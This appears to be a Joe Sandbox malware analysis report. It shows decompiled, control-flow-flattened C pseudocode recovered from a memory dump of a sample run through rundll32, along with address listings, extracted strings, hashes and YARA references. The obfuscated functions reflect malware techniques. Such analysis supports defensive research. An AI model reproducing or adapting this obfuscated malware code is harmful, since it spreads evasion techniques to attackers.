				_t408 = 0x18;
				_v108 = _v108 * 0x12;
				_v108 = _v108 ^ 0x000894d5;
				_v116 = 0x5a78;
				_v116 = _v116 / _t408;
				_v116 = _v116 + 0x27ad;
				_v116 = _v116 ^ 0x00004e34;
				_v76 = 0x7bae;
				_t409 = 0x47;
				_v76 = _v76 / _t409;
				_v76 = _v76 ^ 0x00000ced;
				_v112 = 0x9931;
				_v112 = _v112 + 0x6c1;
				_v112 = _v112 + 0xc184;
				_v112 = _v112 ^ 0x000135f5;
				_v120 = 0x43fe;
				_v120 = _v120 << 0xa;
				_v120 = _v120 | 0xcc2e0fa7;
				_v120 = _v120 ^ 0xcd2fcc20;
				_v160 = 0xf125;
				_v160 = _v160 | 0x7ac202f8;
				_v160 = _v160 << 9;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xff40056a;
				_v168 = 0x6f11;
				_v168 = _v168 * 0x26;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0xffff1ec9;
				_v168 = _v168 ^ 0xffffabe9;
				_v136 = 0x750;
				_v136 = _v136 ^ 0x499ec156;
				_t410 = 0x2c;
				_v136 = _v136 / _t410;
				_v136 = _v136 ^ 0x01ac6e57;
				_v164 = 0xde1f;
				_v164 = _v164 ^ 0x9a2c0c2f;
				_v164 = _v164 ^ 0xfc2f145b;
				_t463 = 0x60;
				_v164 = _v164 / _t463;
				_v164 = _v164 ^ 0x01104128;
				_v92 = 0x3401;
				_v92 = _v92 + 0xfffffc2d;
				_v92 = _v92 ^ 0x00002a73;
				_v188 = 0x45d7;
				_t411 = 0x13;
				_v188 = _v188 * 0x21;
				_v188 = _v188 * 0x1d;
				_v188 = _v188 * 0x48;
				_v188 = _v188 ^ 0x496dbef5;
				_v72 = 0x3e06;
				_v72 = _v72 / _t411;
				_v72 = _v72 ^ 0x000062d8;
				_v80 = 0xd8ef;
				_v80 = _v80 + 0xffffbf53;
				_v80 = _v80 ^ 0x0000c5f4;
				_v88 = 0x5fbd;
				_v88 = _v88 | 0x60cc2402;
				_v88 = _v88 ^ 0x60cc7a75;
				_v132 = 0xf2b5;
				_v132 = _v132 << 8;
				_v132 = _v132 / _t463;
				_v132 = _v132 ^ 0x00028738;
				goto L1;
				do {
					while(1) {
						L1:
						_t469 = _t414 - 0x1739e244;
						if(_t469 > 0) {
							break;
						}
						if(_t469 == 0) {
							E1001F3E9(_v156, _v64, _v172, _t461,  &_v52);
							_t466 =  &(_t466[3]);
							_t414 = 0x28f53702;
							continue;
						} else {
							if(_t414 == 0x9fb2af) {
								E1000CD04(_v108,  *((intOrPtr*)(_t462 + 0x14)), _v116,  &_v52, _v76);
								_t466 =  &(_t466[3]);
								_t414 = 0x25cb38c6;
								continue;
							} else {
								if(_t414 == 0x3f50d67) {
									_t414 = 0xe8afa1d;
									 *_t461 =  *_t461 & 0x00000000;
									_t461[1] = _v132;
									continue;
								} else {
									if(_t414 == 0x65a472b) {
										E1000CD04(_v148,  *((intOrPtr*)(_t462 + 0x10)), _v100,  &_v52, _v180);
										_t466 =  &(_t466[3]);
										_t414 = 0x9fb2af;
										continue;
									} else {
										if(_t414 == 0x966e996) {
											E1000CD04(_v72,  *((intOrPtr*)(_t462 + 0x28)), _v80,  &_v52, _v88);
										} else {
											if(_t414 == 0xe8afa1d) {
												_t461[1] = E10015DAA(_t462);
												_t414 = 0x35acaa76;
												continue;
											} else {
												_t475 = _t414 - 0x16696929;
												if(_t414 != 0x16696929) {
													goto L26;
												} else {
													E10018582(_v136, _t462 + 0x20, _t475, _v164,  &_v52, _v92, _v188);
													_t466 =  &(_t466[4]);
													_t414 = 0x966e996;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t461;
						_t340 =  *_t461 != 0;
						__eflags = _t340;
						return 0 | _t340;
					}
					__eflags = _t414 - 0x1b4d4176;
					if(_t414 == 0x1b4d4176) {
						E1000CD04(_v96,  *((intOrPtr*)(_t462 + 0xc)), _v144,  &_v52, _v104);
						_t466 =  &(_t466[3]);
						_t414 = 0x65a472b;
						goto L26;
					} else {
						__eflags = _t414 - 0x25c5cce0;
						if(_t414 == 0x25c5cce0) {
							E1000CD04(_v68,  *((intOrPtr*)(_t462 + 8)), _v84,  &_v52, _v152);
							_t466 =  &(_t466[3]);
							_t414 = 0x1b4d4176;
							goto L1;
						} else {
							__eflags = _t414 - 0x25cb38c6;
							if(__eflags == 0) {
								E10018582(_v112, _t462 + 0x18, __eflags, _v120,  &_v52, _v160, _v168);
								_t466 =  &(_t466[4]);
								_t414 = 0x16696929;
								goto L1;
							} else {
								__eflags = _t414 - 0x28f53702;
								if(__eflags == 0) {
									E10018582(_v128, _t462, __eflags, _v140,  &_v52, _v176, _v184);
									_t466 =  &(_t466[4]);
									_t414 = 0x25c5cce0;
									goto L1;
								} else {
									__eflags = _t414 - 0x35acaa76;
									if(_t414 != 0x35acaa76) {
										goto L26;
									} else {
										_push(_t414);
										_t402 = E100157E8(_t461[1]);
										 *_t461 = _t402;
										__eflags = _t402;
										if(__eflags != 0) {
											_t414 = 0x1739e244;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t414 - 0xa1cf13b;
				} while (__eflags != 0);
				goto L29;
			}

0x1001469d
0x100146a4
0x100146ab
0x100146ad
0x100146af
0x100146b0
0x100146b5
0x100146bd
0x100146c0
0x100146cd
0x100146d5
0x100146da
0x100146e2
0x100146ed
0x100146f2
0x100146f8
0x10014700
0x10014708
0x10014710
0x10014715
0x1001471d
0x10014725
0x1001472a
0x10014733
0x10014738
0x1001473e
0x10014746
0x10014751
0x10014759
0x10014764
0x1001476c
0x10014774
0x10014779
0x10014781
0x10014789
0x10014791
0x1001479b
0x1001479c
0x100147a0
0x100147a8
0x100147b0
0x100147b5
0x100147bd
0x100147c5
0x100147cd
0x100147d5
0x100147e0
0x100147e4
0x100147ec
0x100147f9
0x100147fd
0x1001480a
0x1001480e
0x10014816
0x10014821
0x1001482c
0x10014837
0x1001483f
0x10014847
0x1001484f
0x1001485c
0x10014868
0x1001486d
0x10014871
0x10014875
0x1001487d
0x1001488d
0x10014893
0x1001489b
0x100148a3
0x100148ab
0x100148b8
0x100148bb
0x100148bf
0x100148c7
0x100148cf
0x100148d7
0x100148df
0x100148ec
0x100148f8
0x100148fc
0x10014904
0x1001490c
0x10014914
0x1001491c
0x10014924
0x1001492c
0x10014934
0x1001493c
0x10014941
0x10014949
0x10014956
0x10014959
0x1001495d
0x10014965
0x10014975
0x10014979
0x10014981
0x10014989
0x1001499b
0x1001499e
0x100149a5
0x100149b0
0x100149b8
0x100149c0
0x100149c8
0x100149d0
0x100149d8
0x100149dd
0x100149e5
0x100149ed
0x100149f5
0x100149fd
0x10014a02
0x10014a07
0x10014a0f
0x10014a1c
0x10014a20
0x10014a25
0x10014a2f
0x10014a37
0x10014a3f
0x10014a4d
0x10014a52
0x10014a56
0x10014a5e
0x10014a66
0x10014a6e
0x10014a7c
0x10014a81
0x10014a85
0x10014a8d
0x10014a95
0x10014a9d
0x10014aa5
0x10014ab4
0x10014ab5
0x10014abe
0x10014ac7
0x10014acb
0x10014ad3
0x10014aee
0x10014af5
0x10014b00
0x10014b0b
0x10014b16
0x10014b21
0x10014b29
0x10014b31
0x10014b39
0x10014b41
0x10014b51
0x10014b55
0x10014b55
0x10014b5d
0x10014b5d
0x10014b5d
0x10014b5d
0x10014b5f
0x00000000
0x00000000
0x10014b65
0x10014c63
0x10014c68
0x10014c6b
0x00000000
0x10014b6b
0x10014b71
0x10014c39
0x10014c3e
0x10014c41
0x00000000
0x10014b77
0x10014b7d
0x10014c12
0x10014c14
0x10014c17
0x00000000
0x10014b83
0x10014b89
0x10014bfc
0x10014c01
0x10014c04
0x00000000
0x10014b8b
0x10014b91
0x10014da3
0x10014b97
0x10014b99
0x10014bd8
0x10014bdb
0x00000000
0x10014b9b
0x10014b9b
0x10014ba1
0x00000000
0x10014ba7
0x10014bc2
0x10014bc7
0x10014bca
0x00000000
0x10014bca
0x10014ba1
0x10014b99
0x10014b91
0x10014b89
0x10014b7d
0x10014b71
0x10014dab
0x10014dad
0x10014db2
0x10014db2
0x10014dbc
0x10014dbc
0x10014c75
0x10014c7b
0x10014d6b
0x10014d70
0x10014d73
0x00000000
0x10014c81
0x10014c81
0x10014c87
0x10014d42
0x10014d47
0x10014d4a
0x00000000
0x10014c8d
0x10014c8d
0x10014c93
0x10014d13
0x10014d18
0x10014d1b
0x00000000
0x10014c95
0x10014c95
0x10014c9b
0x10014ce6
0x10014ceb
0x10014cee
0x00000000
0x10014c9d
0x10014c9d
0x10014ca3
0x00000000
0x10014ca9
0x10014cb1
0x10014cb5
0x10014cba
0x10014cbd
0x10014cbf
0x10014cc5
0x00000000
0x10014cc5
0x10014cbf
0x10014ca3
0x10014c9b
0x10014c93
0x10014c87
0x00000000
0x10014d78
0x10014d78
0x10014d78
0x00000000

Strings

4N, xrefs: 10014981
Ro, xrefs: 1001487D
.NonLinear" bitmapFile="Video.Zoom.NonLinear.Button.mi"/> </style> </style>  <style class="Panel.HtmlInsetPage"> <style class="Panel.HtmlInsetPage.Text" foreground="@LightBlue" fontStyle=", xrefs: 10014B6B, 10014C04
@d, xrefs: 100148CF
s*, xrefs: 10014A9D
[, xrefs: 1001484F
', xrefs: 1001473E

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$.NonLinear" bitmapFile="Video.Zoom.NonLinear.Button.mi"/> </style> </style>  <style class="Panel.HtmlInsetPage"> <style class="Panel.HtmlInsetPage.Text" foreground="@LightBlue" fontStyle="$4N$@d$Ro$[$s*
API String ID: 0-1893583543
Opcode ID: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction ID: 07a38d7209349fe1cc0257583510a44f39c41418860415f0518c45196b6dd939
Opcode Fuzzy Hash: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction Fuzzy Hash: 930214715083818BE364CF24C489A5FFBE2FBC5758F508A1DF29A8A260D7759989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000421E, Relevance: 9.1, Strings: 7, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000421E() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t360;
				void* _t366;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int* _t420;

				_t420 =  &_v1184;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t366 = 0x68d33d8;
				_v1056 = 0x2e288a;
				_v1052 = 0x75c5fe;
				_v1084 = 0xa8f5;
				_t408 = 0x17;
				_v1084 = _v1084 / _t408;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x001d0b4a;
				_v1112 = 0x1fad;
				_v1112 = _v1112 + 0x32f;
				_v1112 = _v1112 | 0xebab1cec;
				_v1112 = _v1112 ^ 0xebab1aef;
				_v1160 = 0x54dd;
				_t409 = 0x5b;
				_v1160 = _v1160 / _t409;
				_v1160 = _v1160 + 0xffff837a;
				_v1160 = _v1160 >> 0xd;
				_v1160 = _v1160 ^ 0x00079eb6;
				_v1064 = 0x3be9;
				_v1064 = _v1064 + 0xc5e5;
				_v1064 = _v1064 ^ 0x0001038f;
				_v1152 = 0xf3a;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 | 0xf0e2a687;
				_v1152 = _v1152 ^ 0xf0e2f519;
				_v1104 = 0x6a02;
				_v1104 = _v1104 ^ 0xd79757ec;
				_v1104 = _v1104 ^ 0x72111d97;
				_v1104 = _v1104 ^ 0xa58624a2;
				_v1180 = 0x1edb;
				_v1180 = _v1180 << 8;
				_v1180 = _v1180 | 0xc66b0f2d;
				_t410 = 0x2a;
				_v1180 = _v1180 * 0x59;
				_v1180 = _v1180 ^ 0x02748563;
				_v1184 = 0xc21d;
				_v1184 = _v1184 + 0xffff4953;
				_v1184 = _v1184 + 0x9d58;
				_v1184 = _v1184 + 0xffffc405;
				_v1184 = _v1184 ^ 0x000079fa;
				_v1068 = 0xa3cf;
				_v1068 = _v1068 << 0xd;
				_v1068 = _v1068 ^ 0x1479d59b;
				_v1096 = 0x8d67;
				_v1096 = _v1096 / _t410;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 ^ 0x00006505;
				_v1076 = 0xcc46;
				_t411 = 0x5a;
				_v1076 = _v1076 * 0x1b;
				_v1076 = _v1076 ^ 0x0015fa07;
				_v1172 = 0x912b;
				_v1172 = _v1172 ^ 0x3d1f1ee2;
				_v1172 = _v1172 + 0x5bc5;
				_v1172 = _v1172 + 0xeec;
				_v1172 = _v1172 ^ 0x3d1fd618;
				_v1088 = 0xd14f;
				_v1088 = _v1088 / _t411;
				_v1088 = _v1088 << 2;
				_v1088 = _v1088 ^ 0x00001f20;
				_v1060 = 0x3e83;
				_v1060 = _v1060 ^ 0xd304f88f;
				_v1060 = _v1060 ^ 0xd304fa7e;
				_v1168 = 0xb05c;
				_v1168 = _v1168 << 8;
				_t412 = 0x34;
				_v1168 = _v1168 / _t412;
				_v1168 = _v1168 ^ 0xc0861c97;
				_v1168 = _v1168 ^ 0xc0851309;
				_v1108 = 0xe1c2;
				_v1108 = _v1108 ^ 0xa90fabc2;
				_v1108 = _v1108 | 0xcfc04e49;
				_v1108 = _v1108 ^ 0xefcf6bdd;
				_v1140 = 0x68db;
				_t413 = 0x4f;
				_v1140 = _v1140 / _t413;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x00007a7a;
				_v1176 = 0x96b;
				_v1176 = _v1176 | 0xfb94fdcf;
				_v1176 = _v1176 << 2;
				_v1176 = _v1176 ^ 0xee53e864;
				_v1124 = 0x2254;
				_v1124 = _v1124 ^ 0xa48881a1;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x451fa827;
				_v1100 = 0x5734;
				_v1100 = _v1100 ^ 0x74517f62;
				_t414 = 7;
				_v1100 = _v1100 * 0x13;
				_v1100 = _v1100 ^ 0xa205a981;
				_v1132 = 0x66ff;
				_v1132 = _v1132 * 0x1f;
				_v1132 = _v1132 + 0xf308;
				_v1132 = _v1132 ^ 0x000d172f;
				_v1080 = 0x2972;
				_v1080 = _v1080 * 0x38;
				_v1080 = _v1080 ^ 0x000935ad;
				_v1116 = 0x9ff8;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 + 0xfffff067;
				_v1116 = _v1116 ^ 0xffff9674;
				_v1092 = 0x2f3f;
				_v1092 = _v1092 ^ 0x892685f6;
				_v1092 = _v1092 + 0xffff53b4;
				_v1092 = _v1092 ^ 0x8925829b;
				_v1164 = 0xb542;
				_v1164 = _v1164 | 0x5ab5abdf;
				_v1164 = _v1164 + 0xffffa79d;
				_v1164 = _v1164 / _t414;
				_v1164 = _v1164 ^ 0x0cf5716d;
				_v1144 = 0x47b6;
				_v1144 = _v1144 * 0x4c;
				_v1144 = _v1144 | 0xf71f6dca;
				_v1144 = _v1144 ^ 0xf71f15ee;
				_v1072 = 0x81ab;
				_v1072 = _v1072 * 0x49;
				_v1072 = _v1072 ^ 0x00249dbb;
				_v1148 = 0xb5d2;
				_v1148 = _v1148 * 0x6d;
				_t415 = 0x2c;
				_v1148 = _v1148 / _t415;
				_v1148 = _v1148 ^ 0x0001b92b;
				_v1120 = 0xe5fa;
				_v1120 = _v1120 >> 0x10;
				_v1120 = _v1120 >> 9;
				_v1120 = _v1120 ^ 0x00005e7f;
				_v1156 = 0xab36;
				_t416 = 0x43;
				_v1156 = _v1156 / _t416;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 << 6;
				_v1156 = _v1156 ^ 0x000049b3;
				_v1128 = 0xa89e;
				_t417 = 0x13;
				_v1128 = _v1128 * 0x34;
				_v1128 = _v1128 / _t417;
				_v1128 = _v1128 ^ 0x0001a301;
				_v1136 = 0xcc9;
				_v1136 = _v1136 + 0xe654;
				_v1136 = _v1136 * 0x71;
				_v1136 = _v1136 ^ 0x006b6140;
				do {
					while(_t366 != 0x68d33d8) {
						if(_t366 == 0xa2fd3bc) {
							_push(0x10001000);
							_push(_v1152);
							E100163BF(E1001BF25(_v1160, _v1064, __eflags), __eflags, _v1180, _v1184,  &_v520,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1096);
							E1001C5F7(_v1076, _v1172, _v1088, _v1060, _t346);
							_t420 =  &(_t420[0xb]);
							_t366 = 0xcdbf6e0;
							continue;
						}
						if(_t366 == 0xcdbf6e0) {
							E10007C9A( &_v1040, _v1168, _t366, _v1108, _v1140);
							E1001BAE0( &_v1040,  &_v1040,  &_v1040);
							E10013D7C( &_v1040, __eflags, _v1116, _v1092,  &_v520);
							_t420 =  &(_t420[9]);
							_t366 = 0x3500b19e;
							continue;
						}
						if(_t366 == 0x24c46d14) {
							_t360 = E10018F65();
							L10:
							_t366 = 0xa2fd3bc;
							continue;
						}
						if(_t366 == 0x304a50c6) {
							_t360 = E1000704B();
							goto L10;
						}
						if(_t366 != 0x3500b19e) {
							goto L17;
						}
						 *((short*)(E10001E13(_v1164, _v1144, _v1072, _v1148,  &_v520))) = 0;
						_t281 =  &_v1156; // 0x6b6140
						return E1001BE71(_v1120,  &_v520,  *_t281, _v1128, _v1136);
					}
					__eflags =  *((intOrPtr*)( *0x100221b0 + 0x22c));
					if(__eflags == 0) {
						_t366 = 0x24c46d14;
						goto L17;
					}
					_t366 = 0x304a50c6;
					continue;
					L17:
					__eflags = _t366 - 0x360d39a3;
				} while (__eflags != 0);
				return _t360;
			}

0x1000421e
0x10004224
0x1000422e
0x10004236
0x1000423b
0x10004246
0x10004251
0x10004263
0x10004268
0x1000426e
0x10004273
0x1000427b
0x10004283
0x1000428b
0x10004293
0x1000429b
0x100042a7
0x100042ac
0x100042b2
0x100042ba
0x100042bf
0x100042c7
0x100042d2
0x100042dd
0x100042e8
0x100042f0
0x100042f5
0x100042fd
0x10004305
0x1000430d
0x10004315
0x1000431d
0x10004325
0x1000432d
0x10004332
0x1000433f
0x10004342
0x10004346
0x1000434e
0x10004356
0x1000435e
0x10004366
0x1000436e
0x10004376
0x10004381
0x10004389
0x10004394
0x100043a4
0x100043a8
0x100043ad
0x100043b5
0x100043c8
0x100043c9
0x100043cd
0x100043d5
0x100043dd
0x100043e5
0x100043ed
0x100043f5
0x100043fd
0x1000440b
0x10004411
0x10004416
0x1000441e
0x10004429
0x10004434
0x1000443f
0x10004447
0x10004452
0x10004457
0x1000445d
0x10004465
0x1000446d
0x10004475
0x1000447d
0x10004485
0x1000448d
0x10004499
0x1000449e
0x100044a4
0x100044a9
0x100044b1
0x100044b9
0x100044c1
0x100044c6
0x100044ce
0x100044d6
0x100044de
0x100044e3
0x100044eb
0x100044f3
0x10004500
0x10004501
0x10004505
0x1000450d
0x1000451a
0x1000451e
0x10004526
0x1000452e
0x1000453b
0x1000453f
0x10004547
0x1000454f
0x10004554
0x1000455c
0x10004564
0x1000456c
0x10004574
0x1000457c
0x10004584
0x1000458c
0x10004594
0x100045a2
0x100045a6
0x100045ae
0x100045bb
0x100045bf
0x100045c7
0x100045cf
0x100045e2
0x100045e9
0x100045f4
0x10004601
0x1000460d
0x10004612
0x10004618
0x10004625
0x10004632
0x1000463c
0x10004641
0x10004649
0x10004655
0x1000465a
0x10004660
0x10004665
0x1000466a
0x10004672
0x1000467f
0x10004680
0x1000468a
0x1000468e
0x10004696
0x1000469e
0x100046ab
0x100046af
0x100046b7
0x100046b7
0x100046c5
0x100047bc
0x100047c1
0x1000480f
0x1000482e
0x10004833
0x10004836
0x00000000
0x10004836
0x100046d1
0x10004765
0x10004784
0x100047aa
0x100047af
0x100047b2
0x00000000
0x100047b2
0x100046d5
0x1000474a
0x1000473f
0x1000473f
0x00000000
0x1000473f
0x100046d9
0x1000473a
0x00000000
0x1000473a
0x100046e1
0x00000000
0x00000000
0x10004718
0x1000471b
0x00000000
0x10004728
0x10004845
0x1000484c
0x10004855
0x00000000
0x10004855
0x1000484e
0x00000000
0x10004857
0x10004857
0x10004857
0x00000000

Strings

4W, xrefs: 100044EB
r), xrefs: 1000452E
dS, xrefs: 100044C6
?/, xrefs: 10004564
@ak, xrefs: 1000471B
;, xrefs: 100042C7
T", xrefs: 100044CE

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4W$?/$@ak$T"$dS$r)$;
API String ID: 0-3846280122
Opcode ID: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
Instruction ID: aaaead02f87506f2cc3ba4b8236e1e241c9b44c198d9f5d598770aa8f5f1306b
Opcode Fuzzy Hash: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
Instruction Fuzzy Hash: FFF131715083809FE368CF25C489A4FBBE2FBC5758F10891DF19A8A260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001EDB9, Relevance: 9.0, Strings: 7, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001EDB9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				void* _t250;
				void* _t253;
				void* _t263;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int* _t298;

				_t298 =  &_v1660;
				_v1584 = 0xa79a;
				_v1584 = _v1584 + 0xffffb587;
				_t263 = 0x29655c79;
				_v1584 = _v1584 ^ 0x00005d08;
				_v1600 = 0x98d7;
				_v1600 = _v1600 << 3;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x00015089;
				_v1576 = 0x4e32;
				_v1576 = _v1576 * 0x22;
				_t289 = 0;
				_v1576 = _v1576 ^ 0x000a4295;
				_v1616 = 0x1d29;
				_v1616 = _v1616 + 0xffff7723;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x01ffbac3;
				_v1632 = 0x8dbf;
				_v1632 = _v1632 >> 0xa;
				_t290 = 0x76;
				_v1632 = _v1632 * 0x3a;
				_v1632 = _v1632 | 0x3b821885;
				_v1632 = _v1632 ^ 0x3b827377;
				_v1640 = 0x104a;
				_v1640 = _v1640 / _t290;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 + 0xffff7725;
				_v1640 = _v1640 ^ 0xffff57b6;
				_v1580 = 0xe6dc;
				_v1580 = _v1580 ^ 0xc8d716f9;
				_v1580 = _v1580 ^ 0xc8d7d197;
				_v1592 = 0xe0fa;
				_t291 = 0x2f;
				_v1592 = _v1592 / _t291;
				_v1592 = _v1592 ^ 0x0000698d;
				_v1564 = 0x5e4f;
				_v1564 = _v1564 + 0xffff7efe;
				_v1564 = _v1564 ^ 0xffffb6a6;
				_v1660 = 0xba44;
				_v1660 = _v1660 * 0x61;
				_v1660 = _v1660 | 0x90c21cb8;
				_v1660 = _v1660 ^ 0xb89d15b1;
				_v1660 = _v1660 ^ 0x285bb090;
				_v1572 = 0x49e8;
				_v1572 = _v1572 | 0x7392aca1;
				_v1572 = _v1572 ^ 0x7392e7ec;
				_v1636 = 0x1558;
				_v1636 = _v1636 + 0xffffdbcc;
				_v1636 = _v1636 + 0xffffaf90;
				_v1636 = _v1636 | 0x27f9081b;
				_v1636 = _v1636 ^ 0xffff923a;
				_v1620 = 0xb008;
				_v1620 = _v1620 ^ 0x6f98128b;
				_v1620 = _v1620 + 0xffff628e;
				_v1620 = _v1620 ^ 0x6f98181c;
				_v1652 = 0x8c98;
				_v1652 = _v1652 + 0xffff2e73;
				_v1652 = _v1652 ^ 0xfa65a217;
				_v1652 = _v1652 ^ 0x9182de5d;
				_v1652 = _v1652 ^ 0x9418af52;
				_v1644 = 0x793;
				_v1644 = _v1644 ^ 0x7d1bb9ea;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 >> 3;
				_v1644 = _v1644 ^ 0x0ddf10b4;
				_v1568 = 0x9636;
				_v1568 = _v1568 << 8;
				_v1568 = _v1568 ^ 0x009600d5;
				_v1648 = 0x45b1;
				_v1648 = _v1648 ^ 0x353fc9cd;
				_v1648 = _v1648 + 0x9448;
				_v1648 = _v1648 + 0xffff2c3a;
				_v1648 = _v1648 ^ 0x353f36fa;
				_v1608 = 0xcb4a;
				_v1608 = _v1608 ^ 0xf323fa50;
				_v1608 = _v1608 + 0xfffff921;
				_v1608 = _v1608 ^ 0xf3231221;
				_v1656 = 0xe414;
				_v1656 = _v1656 << 5;
				_t292 = 0x14;
				_v1656 = _v1656 * 0xb;
				_v1656 = _v1656 / _t292;
				_v1656 = _v1656 ^ 0x000fea65;
				_v1588 = 0xfdd9;
				_v1588 = _v1588 ^ 0x3c6de270;
				_v1588 = _v1588 ^ 0x3c6d203a;
				_v1596 = 0x9110;
				_t293 = 0x5b;
				_v1596 = _v1596 / _t293;
				_v1596 = _v1596 ^ 0xad99dc79;
				_v1596 = _v1596 ^ 0xad99c3bd;
				_v1604 = 0xf5c3;
				_v1604 = _v1604 + 0xffffe486;
				_t294 = 0x52;
				_v1604 = _v1604 / _t294;
				_v1604 = _v1604 ^ 0x00000517;
				_v1612 = 0xce05;
				_v1612 = _v1612 + 0xa493;
				_v1612 = _v1612 | 0x844a9c62;
				_v1612 = _v1612 ^ 0x844bf5c1;
				_v1628 = 0xfbe7;
				_v1628 = _v1628 ^ 0xe81fb84e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xf43ac181;
				_v1624 = 0x777e;
				_t295 = 0x13;
				_v1624 = _v1624 / _t295;
				_v1624 = _v1624 + 0xbc0b;
				_v1624 = _v1624 ^ 0x0000c134;
				do {
					while(_t263 != 0x1a33eb4b) {
						if(_t263 == 0x29655c79) {
							_push(_t263);
							E10001D54(_v1600, _t263, _v1576, _v1616, _v1632,  &_v1040, _v1640, _v1584);
							_t298 =  &(_t298[8]);
							_t263 = 0x3af62d5c;
							continue;
						} else {
							_t302 = _t263 - 0x3af62d5c;
							if(_t263 == 0x3af62d5c) {
								_push(0x10001020);
								_push(_v1564);
								_t253 = E1001BF25(_v1580, _v1592, _t302);
								E100173C0( &_v1560, _t302);
								E10003482(_v1572, _t302,  &_v1040,  &_v520, _v1636, _v1620,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t253, _v1652, _v1644, _v1568);
								E1001C5F7(_v1648, _v1608, _v1656, _v1588, _t253);
								_t298 =  &(_t298[0x11]);
								_t263 = 0x1a33eb4b;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1624);
					_push(0);
					_push( &_v520);
					_push(_t263);
					_push(_v1628);
					_push(_v1612);
					_push(0);
					_push(0);
					_t250 = E100189F6(_v1596, _v1604, __eflags);
					_t298 =  &(_t298[8]);
					__eflags = _t250;
					_t289 =  !=  ? 1 : _t289;
					_t263 = 0x29dc45dd;
					L7:
					__eflags = _t263 - 0x29dc45dd;
				} while (__eflags != 0);
				return _t289;
			}

0x1001edb9
0x1001edbf
0x1001edc9
0x1001edd1
0x1001edd6
0x1001edde
0x1001ede6
0x1001edeb
0x1001edf0
0x1001edf8
0x1001ee0a
0x1001ee0e
0x1001ee10
0x1001ee18
0x1001ee20
0x1001ee28
0x1001ee2d
0x1001ee35
0x1001ee3d
0x1001ee47
0x1001ee4a
0x1001ee4e
0x1001ee56
0x1001ee5e
0x1001ee6e
0x1001ee72
0x1001ee77
0x1001ee7f
0x1001ee87
0x1001ee8f
0x1001ee97
0x1001ee9f
0x1001eeab
0x1001eeae
0x1001eeb2
0x1001eeba
0x1001eec2
0x1001eeca
0x1001eed2
0x1001eedf
0x1001eee3
0x1001eeeb
0x1001eef3
0x1001eefb
0x1001ef03
0x1001ef0b
